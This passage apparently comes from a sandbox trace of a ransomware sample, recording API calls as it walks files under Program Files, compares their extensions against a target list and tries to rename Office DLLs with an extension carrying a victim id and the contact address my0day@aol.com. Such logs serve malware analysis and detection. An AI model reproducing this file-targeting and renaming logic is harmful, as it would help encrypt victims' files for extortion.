Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.166] lstrlenW (lpString=".dbf") returned 4 [0266.166] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.167] lstrlenW (lpString=".1cd") returned 4 [0266.167] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.167] lstrlenW (lpString=".jpg") returned 4 [0266.167] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.167] lstrlenW (lpString=".doc") returned 4 [0266.167] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.167] lstrlenW (lpString=".docx") returned 5 [0266.167] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0266.167] lstrlenW (lpString=".pdf") returned 4 [0266.167] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.167] lstrlenW (lpString=".xls") returned 4 [0266.167] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.167] lstrlenW (lpString=".xlsx") returned 5 [0266.167] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0266.167] lstrlenW (lpString=".ppt") returned 4 [0266.167] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.167] lstrlenW (lpString=".zip") returned 4 [0266.167] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.167] lstrlenW (lpString=".rar") returned 4 [0266.167] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.167] lstrlenW (lpString=".bz2") returned 4 [0266.167] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.167] lstrlenW (lpString=".7z") returned 3 [0266.167] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.167] lstrlenW (lpString=".dbf") returned 4 [0266.167] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.167] lstrlenW (lpString=".1cd") returned 4 [0266.167] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.167] lstrlenW (lpString=".jpg") returned 4 [0266.168] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.168] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0266.168] lstrlenW (lpString="IPSEventLogMsg.dll.mui") returned 22 [0266.168] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0266.168] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=22528) returned 1 [0266.168] CloseHandle (hObject=0x300) returned 1 [0266.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui")) returned 0x20 [0266.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.168] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.168] lstrlenW (lpString=".doc") returned 4 [0266.168] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.168] lstrlenW (lpString=".docx") returned 5 [0266.168] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0266.168] lstrlenW (lpString=".pdf") returned 4 [0266.168] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.168] lstrlenW (lpString=".xls") returned 4 [0266.168] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.168] lstrlenW (lpString=".xlsx") returned 5 [0266.168] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0266.168] lstrlenW (lpString=".ppt") returned 4 [0266.168] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.168] lstrlenW (lpString=".zip") returned 4 [0266.169] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.169] lstrlenW (lpString=".rar") returned 4 [0266.169] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.169] lstrlenW (lpString=".bz2") returned 4 [0266.169] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.169] lstrlenW (lpString=".7z") returned 3 [0266.169] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.169] lstrlenW (lpString=".dbf") returned 4 [0266.169] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.169] lstrlenW (lpString=".1cd") returned 4 [0266.169] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.169] lstrlenW (lpString=".jpg") returned 4 [0266.169] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.169] lstrlenW (lpString=".doc") returned 4 [0266.169] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.169] lstrlenW (lpString=".docx") returned 5 [0266.169] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0266.169] lstrlenW (lpString=".pdf") returned 4 [0266.169] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.169] lstrlenW (lpString=".xls") returned 4 [0266.169] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.169] lstrlenW (lpString=".xlsx") returned 5 [0266.169] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0266.169] lstrlenW (lpString=".ppt") returned 4 [0266.169] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.169] lstrlenW (lpString=".zip") returned 4 [0266.169] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.169] lstrlenW (lpString=".rar") returned 4 [0266.169] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.169] lstrlenW (lpString=".bz2") returned 4 [0266.169] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.170] lstrlenW (lpString=".7z") returned 3 [0266.170] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.170] lstrlenW (lpString=".dbf") returned 4 [0266.170] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.170] lstrlenW (lpString=".1cd") returned 4 [0266.170] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0266.170] lstrlenW (lpString=".jpg") returned 4 [0266.170] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.170] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0266.170] lstrlenW (lpString="IpsMigrationPlugin.dll.mui") returned 26 [0266.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0266.170] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=2560) returned 1 [0266.170] CloseHandle (hObject=0x300) returned 1 [0266.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui")) returned 0x20 [0266.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.170] lstrlenW (lpString=".doc") returned 4 [0266.170] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.170] lstrlenW (lpString=".docx") returned 5 [0266.170] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0266.171] lstrlenW (lpString=".pdf") returned 4 [0266.171] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.171] lstrlenW (lpString=".xls") returned 4 [0266.171] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.171] lstrlenW (lpString=".xlsx") returned 5 [0266.171] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0266.171] lstrlenW (lpString=".ppt") returned 4 [0266.171] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.171] lstrlenW (lpString=".zip") returned 4 [0266.171] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.171] lstrlenW (lpString=".rar") returned 4 [0266.171] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.171] lstrlenW (lpString=".bz2") returned 4 [0266.171] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.171] lstrlenW (lpString=".7z") returned 3 [0266.171] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.171] lstrlenW (lpString=".dbf") returned 4 [0266.171] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.171] lstrlenW (lpString=".1cd") returned 4 [0266.171] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.171] lstrlenW (lpString=".jpg") returned 4 [0266.171] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.171] lstrlenW (lpString=".doc") returned 4 [0266.171] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.171] lstrlenW (lpString=".docx") returned 5 [0266.171] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0266.171] lstrlenW (lpString=".pdf") returned 4 [0266.171] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.171] lstrlenW (lpString=".xls") returned 4 [0266.171] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.171] lstrlenW (lpString=".xlsx") returned 5 [0266.172] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0266.172] lstrlenW (lpString=".ppt") returned 4 [0266.172] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.172] lstrlenW (lpString=".zip") returned 4 [0266.172] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.172] lstrlenW (lpString=".rar") returned 4 [0266.172] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.172] lstrlenW (lpString=".bz2") returned 4 [0266.172] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.172] lstrlenW (lpString=".7z") returned 3 [0266.172] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.172] lstrlenW (lpString=".dbf") returned 4 [0266.172] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.172] lstrlenW (lpString=".1cd") returned 4 [0266.172] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0266.172] lstrlenW (lpString=".jpg") returned 4 [0266.172] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.172] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0266.172] lstrlenW (lpString="micaut.dll.mui") returned 14 [0266.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0266.299] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=8704) returned 1 [0266.299] CloseHandle (hObject=0x2cc) returned 1 [0266.299] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui")) returned 0x20 [0266.299] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.299] lstrlenW (lpString=".doc") returned 4 [0266.299] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.299] lstrlenW (lpString=".docx") returned 5 [0266.299] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0266.299] lstrlenW (lpString=".pdf") returned 4 [0266.299] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.299] lstrlenW (lpString=".xls") returned 4 [0266.299] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.299] lstrlenW (lpString=".xlsx") returned 5 [0266.299] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0266.299] lstrlenW (lpString=".ppt") returned 4 [0266.299] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.299] lstrlenW (lpString=".zip") returned 4 [0266.299] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.299] lstrlenW (lpString=".rar") returned 4 [0266.299] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.299] lstrlenW (lpString=".bz2") returned 4 [0266.299] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.299] lstrlenW (lpString=".7z") returned 3 [0266.300] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.300] lstrlenW (lpString=".dbf") returned 4 [0266.300] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.300] lstrlenW (lpString=".1cd") returned 4 [0266.300] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.300] lstrlenW (lpString=".jpg") returned 4 [0266.300] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.300] lstrlenW (lpString=".doc") returned 4 [0266.300] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.300] lstrlenW (lpString=".docx") returned 5 [0266.300] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0266.300] lstrlenW (lpString=".pdf") returned 4 [0266.300] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.300] lstrlenW (lpString=".xls") returned 4 [0266.300] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.300] lstrlenW (lpString=".xlsx") returned 5 [0266.300] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0266.300] lstrlenW (lpString=".ppt") returned 4 [0266.300] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.300] lstrlenW (lpString=".zip") returned 4 [0266.300] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.300] lstrlenW (lpString=".rar") returned 4 [0266.301] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.301] lstrlenW (lpString=".bz2") returned 4 [0266.301] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.301] lstrlenW (lpString=".7z") returned 3 [0266.301] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.301] lstrlenW (lpString=".dbf") returned 4 [0266.301] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.301] lstrlenW (lpString=".1cd") returned 4 [0266.301] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0266.301] lstrlenW (lpString=".jpg") returned 4 [0266.301] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.301] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0266.301] lstrlenW (lpString="TabIpsps.dll") returned 12 [0266.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0266.301] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=40448) returned 1 [0266.301] CloseHandle (hObject=0x2cc) returned 1 [0266.301] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll")) returned 0x20 [0266.301] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0266.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0266.302] lstrlenW (lpString=".doc") returned 4 [0266.302] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0266.302] lstrlenW (lpString=".docx") returned 5 [0266.302] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0266.302] lstrlenW (lpString=".pdf") returned 4 [0266.302] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0266.302] lstrlenW (lpString=".xls") returned 4 [0266.302] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0266.302] lstrlenW (lpString=".xlsx") returned 5 [0266.302] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0266.302] lstrlenW (lpString=".ppt") returned 4 [0266.302] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0266.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0266.302] lstrlenW (lpString=".zip") returned 4 [0266.302] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0266.302] lstrlenW (lpString=".rar") returned 4 [0266.302] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0266.302] lstrlenW (lpString=".bz2") returned 4 [0266.302] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0266.302] lstrlenW (lpString=".7z") returned 3 [0266.302] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0266.318] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.321] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.322] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.322] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.327] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.328] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft 